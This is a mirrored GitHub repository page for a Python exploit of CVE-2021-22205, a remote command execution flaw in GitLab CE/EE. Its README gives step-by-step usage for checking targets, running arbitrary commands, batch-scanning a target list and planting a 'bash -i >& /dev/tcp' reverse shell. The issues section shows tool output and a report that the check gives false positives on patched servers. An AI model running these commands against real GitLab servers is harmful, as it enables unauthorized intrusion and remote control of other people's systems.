Light

al1ex / cve-2021-22205 Goto Github PK

View Code? Open in Web Editor NEW

261.0 2.0 100.0 617 KB

CVE-2021-22205& GitLab CE/EE RCE

Python 100.00%

cve-2021-22205

cve-2021-22205's Introduction

Vuln Impact

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vuln Product

Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8

Environment

export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Vunl Check

Basic usage

python3 CVE-2021-2205.py

Vuln check

python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

command execute

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"

batch scan

python3 CVE-2021-2205.py -s true -f target.txt

Reserve Shell

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"

Reference

https://github.com/mr-r3bot/Gitlab-CVE-2021-22205

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

cve-2021-22205's People

Contributors

Stargazers

Watchers

Forkers

jeromeyoung crackercat mxm-tools jsdryan asiaforest xiaoyanyuha secjia ykankaya trckbyii pirenga darktrong carlosevieira blaisechin ivybao0628 bluesky92 nocomp mav1814 awake-ui testyn rwincey cclauss sry309 jimdx jwmsg0525 fdlucifer leekeey rassec zhouzu lonegunman001 5l1v3r1 washgo cool-y yukissx ak47-sec sparkns test502git nopadd titcr c0isini gtx8090ti aaron-13 wafinfo nickwang2 z3n70 30579096 mntn0x mibyi mahmoodsasad gysf666 i3ef0xh4ck wardens ruyueattention patrickstarwow darkfunct blackgit2 ti0s nanaao yt1604 bluebird88 xiaoq1z qiudaxia134 ooeeoon sylj-k zzh999 dk47os3r wudixiaojiucai fanzhaobao1 wushigudan gml-sec fzggshhhs echo503 gobiggo xianshengwang123 imagestich qianlizlp h1skaak 1cep3ak nnewkin hittergo happy-wyq chenser9 leviliangtw ronin001 linxin2020new kuustudio wuha0926 exam-jcfxu safe3s zhuxi1965 ymjie nyx2022 bigs3cir luzhenx nannanshen msr00t mihoks werwolfz byteb4nd1t ro0tmylove hdys0vn

cve-2021-22205's Issues

Index out of range

Hi, follow your tutorial, I compose a docker container and then exploit it. Then I got an error. I wonder why this happen. Thanks.

$ python CVE-2021-22205.py -a true -t http://ip172-18-0-67-c5tpmgfnjsv000d1q4g0-80.direct.labs.play-with-docker.com -c whoami

          ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____
         / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___|
        | |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
        | |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
        \____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/

                                        Author:Al1ex@Heptagram
                                Github:https://github.com/Al1ex


        验证模式：python CVE-2021-22205.py -v true -t target_url
        攻击模式：python CVE-2021-22205.py -a true -t target_url -c command
        批量检测：python CVE-2021-22205.py -s true -f file

list index out of range

got some error.

this is what i get:

python3 CVE-2021-22205.py
File "CVE-2021-22205.py", line 38
"X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}
^
SyntaxError: invalid syntax

漏洞修复后，POC 验证仍报目标存在漏洞

根据这个链接的回复，在更新 Gitlab 环境中的 ExifTool 版本至修复版本后，就能避免此问题。

我在我的环境中通过这个方式修复后，再通过链接开头所述的 POC，验证，发现已经无法执行图片中所隐藏的命令。

但是修复后，我的环境通过本 repo 的 POC 进行验证，发现还会报“目标存在漏洞”。

通过查看该 repo 的 POC 代码，发现是通过上传图片后，判断 http 响应中是否存在 Failed to process image 来确定是否存在漏洞。实际上，修复后的环境上传 POC 图片仍然会是报 Failed to process image，但隐藏命令不会被执行

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.